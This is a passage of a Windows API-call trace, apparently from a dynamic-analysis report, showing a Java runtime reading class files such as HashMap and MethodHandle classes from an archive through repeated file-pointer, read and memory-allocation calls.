_Dest="java/util/HashMap$Values.class") returned="java/util/HashMap$Values.class" [0115.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3058778, lpNewFilePointer=0x2089a10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a10*=50694008) returned 1 [0115.354] ReadFile (in: hFile=0x134, lpBuffer=0x2089a60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20899e0, lpOverlapped=0x0 | out: lpBuffer=0x2089a60*, lpNumberOfBytesRead=0x20899e0*=0x1e, lpOverlapped=0x0) returned 1 [0115.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30587b4, lpNewFilePointer=0x2089a70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a70*=50694068) returned 1 [0115.355] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x651, lpNumberOfBytesRead=0x2089a40, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x2089a40*=0x651, lpOverlapped=0x0) returned 1 [0115.355] free (_Block=0x12ef1530) [0115.355] free (_Block=0x1228ed20) [0115.361] strlen (_Str="java/util/HashMap$ValueIterator.class") returned 0x25 [0115.361] malloc (_Size=0x48) returned 0x1228ed20 [0115.361] malloc (_Size=0xa0) returned 0x12dac5a0 [0115.361] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34156bf, lpNewFilePointer=0x2089e10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089e10*=54613695) returned 1 [0115.361] ReadFile (in: hFile=0x134, lpBuffer=0x12dac5a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089de0, lpOverlapped=0x0 | out: lpBuffer=0x12dac5a0*, lpNumberOfBytesRead=0x2089de0*=0xa0, lpOverlapped=0x0) returned 1 [0115.361] malloc (_Size=0x26) returned 0x12ef1530 [0115.362] strlen (_Str="java/util/HashMap$ValueIterator.class") returned 0x25 [0115.362] strcpy (in: _Dest=0x2089f90, _Source="java/util/HashMap$ValueIterator.class" | out: _Dest="java/util/HashMap$ValueIterator.class") returned="java/util/HashMap$ValueIterator.class" [0115.362] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30584a8, lpNewFilePointer=0x2089a10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a10*=50693288) returned 1 [0115.362] ReadFile (in: hFile=0x134, lpBuffer=0x2089a60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20899e0, lpOverlapped=0x0 | out: lpBuffer=0x2089a60*, lpNumberOfBytesRead=0x20899e0*=0x1e, lpOverlapped=0x0) returned 1 [0115.362] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30584eb, lpNewFilePointer=0x2089a70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089a70*=50693355) returned 1 [0115.362] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x28d, lpNumberOfBytesRead=0x2089a40, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x2089a40*=0x28d, lpOverlapped=0x0) returned 1 [0115.362] free (_Block=0x12ef1560) [0115.363] free (_Block=0x12ed3fc0) [0115.487] strlen (_Str="java/lang/NoSuchFieldException.class") returned 0x24 [0115.487] malloc (_Size=0x48) returned 0x12e609b0 [0115.487] malloc (_Size=0xa0) returned 0x12dab100 [0115.487] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414f06, lpNewFilePointer=0x208aff0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aff0*=54611718) returned 1 [0115.487] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208afc0, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208afc0*=0xa0, lpOverlapped=0x0) returned 1 [0115.487] malloc (_Size=0x25) returned 0x12e5bba0 [0115.488] strlen (_Str="java/lang/NoSuchFieldException.class") returned 0x24 [0115.488] strcpy (in: _Dest=0x208b170, _Source="java/lang/NoSuchFieldException.class" | out: _Dest="java/lang/NoSuchFieldException.class") returned="java/lang/NoSuchFieldException.class" [0115.488] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30397c5, lpNewFilePointer=0x208abf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208abf0*=50567109) returned 1 [0115.488] ReadFile (in: hFile=0x134, lpBuffer=0x208ac40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208abc0, lpOverlapped=0x0 | out: lpBuffer=0x208ac40*, lpNumberOfBytesRead=0x208abc0*=0x1e, lpOverlapped=0x0) returned 1 [0115.489] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3039807, lpNewFilePointer=0x208ac50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ac50*=50567175) returned 1 [0115.489] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x129, lpNumberOfBytesRead=0x208ac20, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ac20*=0x129, lpOverlapped=0x0) returned 1 [0115.489] free (_Block=0x12ef1530) [0115.490] free (_Block=0x1228ed20) [0115.535] strlen (_Str="java/lang/invoke/InvokerBytecodeGenerator$CpPatch.class") returned 0x37 [0115.536] malloc (_Size=0x48) returned 0x12e60be0 [0115.536] malloc (_Size=0xa0) returned 0x12dac020 [0115.536] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414ea1, lpNewFilePointer=0x208a970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a970*=54611617) returned 1 [0115.536] ReadFile (in: hFile=0x134, lpBuffer=0x12dac020, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a940, lpOverlapped=0x0 | out: lpBuffer=0x12dac020*, lpNumberOfBytesRead=0x208a940*=0xa0, lpOverlapped=0x0) returned 1 [0115.538] malloc (_Size=0x38) returned 0x12ef4410 [0115.538] strlen (_Str="java/lang/invoke/InvokerBytecodeGenerator$CpPatch.class") returned 0x37 [0115.538] strcpy (in: _Dest=0x208aaf0, _Source="java/lang/invoke/InvokerBytecodeGenerator$CpPatch.class" | out: _Dest="java/lang/invoke/InvokerBytecodeGenerator$CpPatch.class") returned="java/lang/invoke/InvokerBytecodeGenerator$CpPatch.class" [0115.538] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30393cd, lpNewFilePointer=0x208a570, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a570*=50566093) returned 1 [0115.538] ReadFile (in: hFile=0x134, lpBuffer=0x208a5c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a540, lpOverlapped=0x0 | out: lpBuffer=0x208a5c0*, lpNumberOfBytesRead=0x208a540*=0x1e, lpOverlapped=0x0) returned 1 [0115.539] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3039422, lpNewFilePointer=0x208a5d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a5d0*=50566178) returned 1 [0115.539] ReadFile (in: hFile=0x134, lpBuffer=0x12e01e80, nNumberOfBytesToRead=0x3a3, lpNumberOfBytesRead=0x208a5a0, lpOverlapped=0x0 | out: lpBuffer=0x12e01e80*, lpNumberOfBytesRead=0x208a5a0*=0x3a3, lpOverlapped=0x0) returned 1 [0115.540] free (_Block=0x12e5bba0) [0115.540] free (_Block=0x12e609b0) [0115.555] strlen (_Str="java/lang/invoke/DirectMethodHandle$Accessor.class") returned 0x32 [0115.556] malloc (_Size=0x48) returned 0x12e60820 [0115.556] malloc (_Size=0xa0) returned 0x12dabec0 [0115.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414e41, lpNewFilePointer=0x208ae90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae90*=54611521) returned 1 [0115.556] ReadFile (in: hFile=0x134, lpBuffer=0x12dabec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ae60, lpOverlapped=0x0 | out: lpBuffer=0x12dabec0*, lpNumberOfBytesRead=0x208ae60*=0xa0, lpOverlapped=0x0) returned 1 [0115.557] malloc (_Size=0x33) returned 0x12ef4450 [0115.557] strlen (_Str="java/lang/invoke/DirectMethodHandle$Accessor.class") returned 0x32 [0115.557] strcpy (in: _Dest=0x208b010, _Source="java/lang/invoke/DirectMethodHandle$Accessor.class" | out: _Dest="java/lang/invoke/DirectMethodHandle$Accessor.class") returned="java/lang/invoke/DirectMethodHandle$Accessor.class" [0115.558] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3038e4a, lpNewFilePointer=0x208aa90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aa90*=50564682) returned 1 [0115.558] ReadFile (in: hFile=0x134, lpBuffer=0x208aae0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208aa60, lpOverlapped=0x0 | out: lpBuffer=0x208aae0*, lpNumberOfBytesRead=0x208aa60*=0x1e, lpOverlapped=0x0) returned 1 [0115.559] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3038e9a, lpNewFilePointer=0x208aaf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aaf0*=50564762) returned 1 [0115.559] ReadFile (in: hFile=0x134, lpBuffer=0x12e01e80, nNumberOfBytesToRead=0x533, lpNumberOfBytesRead=0x208aac0, lpOverlapped=0x0 | out: lpBuffer=0x12e01e80*, lpNumberOfBytesRead=0x208aac0*=0x533, lpOverlapped=0x0) returned 1 [0115.559] free (_Block=0x12ef4410) [0115.560] free (_Block=0x12e60be0) [0115.687] strlen (_Str="java/util/RandomAccessSubList.class") returned 0x23 [0115.687] malloc (_Size=0x48) returned 0x12e60320 [0115.687] malloc (_Size=0xa0) returned 0x12dab100 [0115.687] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414da5, lpNewFilePointer=0x208c4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4f0*=54611365) returned 1 [0115.687] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4c0, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208c4c0*=0xa0, lpOverlapped=0x0) returned 1 [0115.688] malloc (_Size=0x24) returned 0x12e5bcf0 [0115.688] strlen (_Str="java/util/RandomAccessSubList.class") returned 0x23 [0115.688] strcpy (in: _Dest=0x208c670, _Source="java/util/RandomAccessSubList.class" | out: _Dest="java/util/RandomAccessSubList.class") returned="java/util/RandomAccessSubList.class" [0115.689] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3038567, lpNewFilePointer=0x208c0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0f0*=50562407) returned 1 [0115.690] ReadFile (in: hFile=0x134, lpBuffer=0x208c140, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0c0, lpOverlapped=0x0 | out: lpBuffer=0x208c140*, lpNumberOfBytesRead=0x208c0c0*=0x1e, lpOverlapped=0x0) returned 1 [0115.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30385a8, lpNewFilePointer=0x208c150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c150*=50562472) returned 1 [0115.691] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1c5, lpNumberOfBytesRead=0x208c120, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208c120*=0x1c5, lpOverlapped=0x0) returned 1 [0115.692] free (_Block=0x12ef4450) [0115.692] free (_Block=0x12e60820) [0115.694] strlen (_Str="java/util/SubList.class") returned 0x17 [0115.694] malloc (_Size=0x48) returned 0x12e60960 [0115.694] malloc (_Size=0xa0) returned 0x12daaef0 [0115.694] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414d60, lpNewFilePointer=0x208bab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bab0*=54611296) returned 1 [0115.695] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba80, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208ba80*=0xa0, lpOverlapped=0x0) returned 1 [0115.695] malloc (_Size=0x18) returned 0x12db17d0 [0115.696] strlen (_Str="java/util/SubList.class") returned 0x17 [0115.696] strcpy (in: _Dest=0x208bc30, _Source="java/util/SubList.class" | out: _Dest="java/util/SubList.class") returned="java/util/SubList.class" [0115.696] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3037896, lpNewFilePointer=0x208b6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6b0*=50559126) returned 1 [0115.696] ReadFile (in: hFile=0x134, lpBuffer=0x208b700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b680, lpOverlapped=0x0 | out: lpBuffer=0x208b700*, lpNumberOfBytesRead=0x208b680*=0x1e, lpOverlapped=0x0) returned 1 [0115.697] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30378cb, lpNewFilePointer=0x208b710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b710*=50559179) returned 1 [0115.697] ReadFile (in: hFile=0x134, lpBuffer=0x12e01fc0, nNumberOfBytesToRead=0xc9c, lpNumberOfBytesRead=0x208b6e0, lpOverlapped=0x0 | out: lpBuffer=0x12e01fc0*, lpNumberOfBytesRead=0x208b6e0*=0xc9c, lpOverlapped=0x0) returned 1 [0115.698] free (_Block=0x12e5bcf0) [0115.698] free (_Block=0x12e60320) [0115.700] malloc (_Size=0x48) returned 0x12e60aa0 [0115.701] malloc (_Size=0xa0) returned 0x12dab100 [0115.701] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414d19, lpNewFilePointer=0x208c370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c370*=54611225) returned 1 [0115.701] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c340, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208c340*=0xa0, lpOverlapped=0x0) returned 1 [0115.702] malloc (_Size=0x1a) returned 0x12e5c200 [0115.702] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30371cf, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=50557391) returned 1 [0115.702] ReadFile (in: hFile=0x134, lpBuffer=0x208bfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x208bfc0*, lpNumberOfBytesRead=0x208bf40*=0x1e, lpOverlapped=0x0) returned 1 [0115.703] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3037206, lpNewFilePointer=0x208bfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfd0*=50557446) returned 1 [0115.703] ReadFile (in: hFile=0x134, lpBuffer=0x12e01e80, nNumberOfBytesToRead=0x690, lpNumberOfBytesRead=0x208bfa0, lpOverlapped=0x0 | out: lpBuffer=0x12e01e80*, lpNumberOfBytesRead=0x208bfa0*=0x690, lpOverlapped=0x0) returned 1 [0115.705] malloc (_Size=0x48) returned 0x12e60af0 [0115.705] malloc (_Size=0xa0) returned 0x12dabd60 [0115.705] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414c7d, lpNewFilePointer=0x208c290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c290*=54611069) returned 1 [0115.705] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c260, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c260*=0xa0, lpOverlapped=0x0) returned 1 [0115.706] malloc (_Size=0x25) returned 0x12e5bc30 [0115.706] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303695d, lpNewFilePointer=0x208be90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be90*=50555229) returned 1 [0115.706] ReadFile (in: hFile=0x134, lpBuffer=0x208bee0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be60, lpOverlapped=0x0 | out: lpBuffer=0x208bee0*, lpNumberOfBytesRead=0x208be60*=0x1e, lpOverlapped=0x0) returned 1 [0115.707] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x303699f, lpNewFilePointer=0x208bef0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bef0*=50555295) returned 1 [0115.707] ReadFile (in: hFile=0x134, lpBuffer=0x12e01e80, nNumberOfBytesToRead=0x625, lpNumberOfBytesRead=0x208bec0, lpOverlapped=0x0 | out: lpBuffer=0x12e01e80*, lpNumberOfBytesRead=0x208bec0*=0x625, lpOverlapped=0x0) returned 1 [0115.710] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.711] strlen (_Str="java/lang/invoke/LambdaForm") returned 0x1b [0115.717] strlen (_Str="java/lang/invoke/MethodType") returned 0x1b [0115.719] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.722] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.723] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.728] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.732] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.734] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.738] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.743] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.745] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.745] strlen (_Str="java/lang/invoke/LambdaForm") returned 0x1b [0115.746] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.747] strlen (_Str="java/lang/invoke/LambdaForm$NamedFunction") returned 0x29 [0115.748] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.748] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.750] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.757] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.758] strlen (_Str="java/lang/invoke/MethodType") returned 0x1b [0115.759] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.762] strlen (_Str="java/util/List") returned 0xe [0115.765] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.767] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.769] strlen (_Str="java/lang/invoke/LambdaForm$Name") returned 0x20 [0115.770] strlen (_Str="java/lang/invoke/LambdaForm$BasicType") returned 0x25 [0115.770] strlen (_Str="java/lang/invoke/LambdaForm$NamedFunction") returned 0x29 [0115.776] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.778] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.779] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.781] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.782] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.784] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.785] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.787] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.788] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.790] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.792] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.795] strlen (_Str="java/lang/invoke/MethodHandle") returned 0x1d [0115.828] strlen (_Str="java/lang/invoke/DirectMethodHandle$Special.class") returned 0x31 [0115.828] malloc (_Size=0x48) returned 0x12e60690 [0115.828] malloc (_Size=0xa0) returned 0x12dabc00 [0115.828] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34100e2, lpNewFilePointer=0x208d270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d270*=54591714) returned 1 [0115.828] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d240, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208d240*=0xa0, lpOverlapped=0x0) returned 1 [0115.830] malloc (_Size=0x32) returned 0x12ef4410 [0115.831] strlen (_Str="java/lang/invoke/DirectMethodHandle$Special.class") returned 0x31 [0115.831] strcpy (in: _Dest=0x208d3f0, _Source="java/lang/invoke/DirectMethodHandle$Special.class" | out: _Dest="java/lang/invoke/DirectMethodHandle$Special.class") returned="java/lang/invoke/DirectMethodHandle$Special.class" [0115.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f80401, lpNewFilePointer=0x208ce70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce70*=49808385) returned 1 [0115.831] ReadFile (in: hFile=0x134, lpBuffer=0x208cec0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce40, lpOverlapped=0x0 | out: lpBuffer=0x208cec0*, lpNumberOfBytesRead=0x208ce40*=0x1e, lpOverlapped=0x0) returned 1 [0115.833] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f80450, lpNewFilePointer=0x208ced0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ced0*=49808464) returned 1 [0115.833] ReadFile (in: hFile=0x134, lpBuffer=0x12da1f40, nNumberOfBytesToRead=0x37c, lpNumberOfBytesRead=0x208cea0, lpOverlapped=0x0 | out: lpBuffer=0x12da1f40*, lpNumberOfBytesRead=0x208cea0*=0x37c, lpOverlapped=0x0) returned 1 [0115.834] free (_Block=0x12e5bc30) [0115.834] free (_Block=0x12e60af0) [0115.871] strlen (_Str="java/lang/invoke/MethodHandleImpl$AsVarargsCollector.class") returned 0x3a [0115.871] malloc (_Size=0x48) returned 0x12e60b90 [0115.871] malloc (_Size=0xa0) returned 0x12dac9c0 [0115.871] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414c15, lpNewFilePointer=0x208ca10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca10*=54610965) returned 1 [0115.871] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c9e0, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c9e0*=0xa0, lpOverlapped=0x0) returned 1 [0115.871] malloc (_Size=0x3b) returned 0x12e60b40 [0115.872] strlen (_Str="java/lang/invoke/MethodHandleImpl$AsVarargsCollector.class") returned 0x3a [0115.872] strcpy (in: _Dest=0x208cb90, _Source="java/lang/invoke/MethodHandleImpl$AsVarargsCollector.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$AsVarargsCollector.class") returned="java/lang/invoke/MethodHandleImpl$AsVarargsCollector.class" [0115.872] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3035cb2, lpNewFilePointer=0x208c610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c610*=50551986) returned 1 [0115.872] ReadFile (in: hFile=0x134, lpBuffer=0x208c660, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c5e0, lpOverlapped=0x0 | out: lpBuffer=0x208c660*, lpNumberOfBytesRead=0x208c5e0*=0x1e, lpOverlapped=0x0) returned 1 [0115.875] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3035d0a, lpNewFilePointer=0x208c670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c670*=50552074) returned 1 [0115.875] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0xc53, lpNumberOfBytesRead=0x208c640, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208c640*=0xc53, lpOverlapped=0x0) returned 1 [0115.876] free (_Block=0x12ef4410) [0115.876] free (_Block=0x12e60690) [0115.880] strlen (_Str="java/lang/invoke/DelegatingMethodHandle.class") returned 0x2d [0115.881] malloc (_Size=0x48) returned 0x12e60a50 [0115.881] malloc (_Size=0xa0) returned 0x12daace0 [0115.881] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414bba, lpNewFilePointer=0x208bfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfd0*=54610874) returned 1 [0115.881] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfa0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208bfa0*=0xa0, lpOverlapped=0x0) returned 1 [0115.882] malloc (_Size=0x2e) returned 0x12ef4410 [0115.882] strlen (_Str="java/lang/invoke/DelegatingMethodHandle.class") returned 0x2d [0115.883] strcpy (in: _Dest=0x208c150, _Source="java/lang/invoke/DelegatingMethodHandle.class" | out: _Dest="java/lang/invoke/DelegatingMethodHandle.class") returned="java/lang/invoke/DelegatingMethodHandle.class" [0115.883] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3034993, lpNewFilePointer=0x208bbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbd0*=50547091) returned 1 [0115.883] ReadFile (in: hFile=0x134, lpBuffer=0x208bc20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bba0, lpOverlapped=0x0 | out: lpBuffer=0x208bc20*, lpNumberOfBytesRead=0x208bba0*=0x1e, lpOverlapped=0x0) returned 1 [0115.885] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30349de, lpNewFilePointer=0x208bc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc30*=50547166) returned 1 [0115.885] ReadFile (in: hFile=0x134, lpBuffer=0x12318550, nNumberOfBytesToRead=0x12d4, lpNumberOfBytesRead=0x208bc00, lpOverlapped=0x0 | out: lpBuffer=0x12318550*, lpNumberOfBytesRead=0x208bc00*=0x12d4, lpOverlapped=0x0) returned 1 [0115.886] free (_Block=0x12e60b40) [0115.886] free (_Block=0x12e60b90) [0115.912] malloc (_Size=0x48) returned 0x12e60690 [0115.912] malloc (_Size=0xa0) returned 0x12daace0 [0115.913] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414b5d, lpNewFilePointer=0x208c2a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2a0*=54610781) returned 1 [0115.913] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c270, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c270*=0xa0, lpOverlapped=0x0) returned 1 [0115.913] malloc (_Size=0x30) returned 0x12ef4450 [0115.914] strlen (_Str="java/lang/invoke/WrongMethodTypeException.class") returned 0x2f [0115.914] strcpy (in: _Dest=0x208c420, _Source="java/lang/invoke/WrongMethodTypeException.class" | out: _Dest="java/lang/invoke/WrongMethodTypeException.class") returned="java/lang/invoke/WrongMethodTypeException.class" [0115.914] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3034781, lpNewFilePointer=0x208bea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bea0*=50546561) returned 1 [0115.914] ReadFile (in: hFile=0x134, lpBuffer=0x208bef0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be70, lpOverlapped=0x0 | out: lpBuffer=0x208bef0*, lpNumberOfBytesRead=0x208be70*=0x1e, lpOverlapped=0x0) returned 1 [0115.915] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30347ce, lpNewFilePointer=0x208bf00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf00*=50546638) returned 1 [0115.915] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x1c5, lpNumberOfBytesRead=0x208bed0, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208bed0*=0x1c5, lpOverlapped=0x0) returned 1 [0115.915] free (_Block=0x12ef4410) [0115.915] free (_Block=0x12e60a50) [0115.955] strlen (_Str="java/lang/invoke/MethodHandleImpl$Lazy.class") returned 0x2c [0115.955] malloc (_Size=0x48) returned 0x12e60c80 [0115.955] malloc (_Size=0xa0) returned 0x12daace0 [0115.955] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414b03, lpNewFilePointer=0x208c4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4f0*=54610691) returned 1 [0115.955] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4c0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c4c0*=0xa0, lpOverlapped=0x0) returned 1 [0115.956] malloc (_Size=0x2d) returned 0x12ef4410 [0115.957] strlen (_Str="java/lang/invoke/MethodHandleImpl$Lazy.class") returned 0x2c [0115.957] strcpy (in: _Dest=0x208c670, _Source="java/lang/invoke/MethodHandleImpl$Lazy.class" | out: _Dest="java/lang/invoke/MethodHandleImpl$Lazy.class") returned="java/lang/invoke/MethodHandleImpl$Lazy.class" [0115.957] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3033af1, lpNewFilePointer=0x208c0f0, 